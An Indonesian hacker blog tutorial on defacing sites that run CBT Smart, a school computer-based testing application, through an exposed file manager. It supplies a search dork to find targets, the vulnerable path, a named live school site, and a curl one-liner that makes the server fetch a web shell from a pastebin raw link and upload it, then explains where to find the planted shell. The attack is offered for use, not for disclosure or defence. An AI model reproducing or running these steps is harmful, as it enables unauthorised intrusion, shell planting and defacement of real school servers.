Deface PoC CBT Smart to Remote Code Execution

Hai gan kembali ama Kang Heker Tapi Nolep :v
Kali ini we akan ngasih tutorial Deface ea, No Depes No Lep akwowkwo
Simak baek baek yak.....

Apa itu CBT Smart?

(Computer Based Test)CBT Smart merupakan perangkat lunak lanjutan dengan mengefektifkan dan mengefisiensikan sumber daya yang ada untuk mendampingi sekolah menuju pengembangan dan peningkatan mutu pendidikannya.

Apa sih itu Remote Code Execution?

Remote Code Execution adalah salah satu Bug yang berbahaya, sebagaimana Hacker dapat memanfaatkan celah Bug tersebut. Bagaimana Hacker bisa menembus dengan celah Bug Remote Code Execution? Hacker dapat meremote codingan berupa backdoor yang dapat disisipkan di celah RCE ini.

Dork : intext:"Supported by Beesmart"
Exploit : /admin/ifm.php
Live : https://financesmkyaspia.com/
Note :" Teknik ini menggunakan aplikasi termux atau bisa juga menggunakan terminal dengan menginstall curl dahulu. Siapkan source code shell dipastebin lalu di raw"

1. Dorking dahulu atau we nyediain live target diatas
2. Taruh Exploitnya, ciri ciri vuln nya yakni ketika memasukan exploit akan redirect ke admin login lah :v

3. Lalu kalian install termux, pastikan kalian sudah menginstall curl nya. Masukkan kode dibawah ini
curl https://financesmkyaspia.com/ujian/admin/ifm.php -d 'api=remoteUpload&dir=&filename=db.php&method=curl&url=https://pastebin.com/raw/tizUkMj9'

Note :"link pastebin bisa diganti dengan shell kalian, dan bagian filename=db.php bisa diganti serah kalian, itu nama shell nya" . Jika seperti bawah maka berhasil diupload shell kalian

4. Jika seperti bawah ini tandanya dir merah, tidak bisa diupload shell kita

atau keluar source code nya :v

5. Cara mencari shellnya tinggal kalian /files/namashell.php

Sekian tutor dari hekernolep :v , request aja gan tetapi we ga terlalu pro hehe. Ini aja we minta bantuan si Z4X , we ngasih tutorial semampu we. Thanks ea jangan lupa share.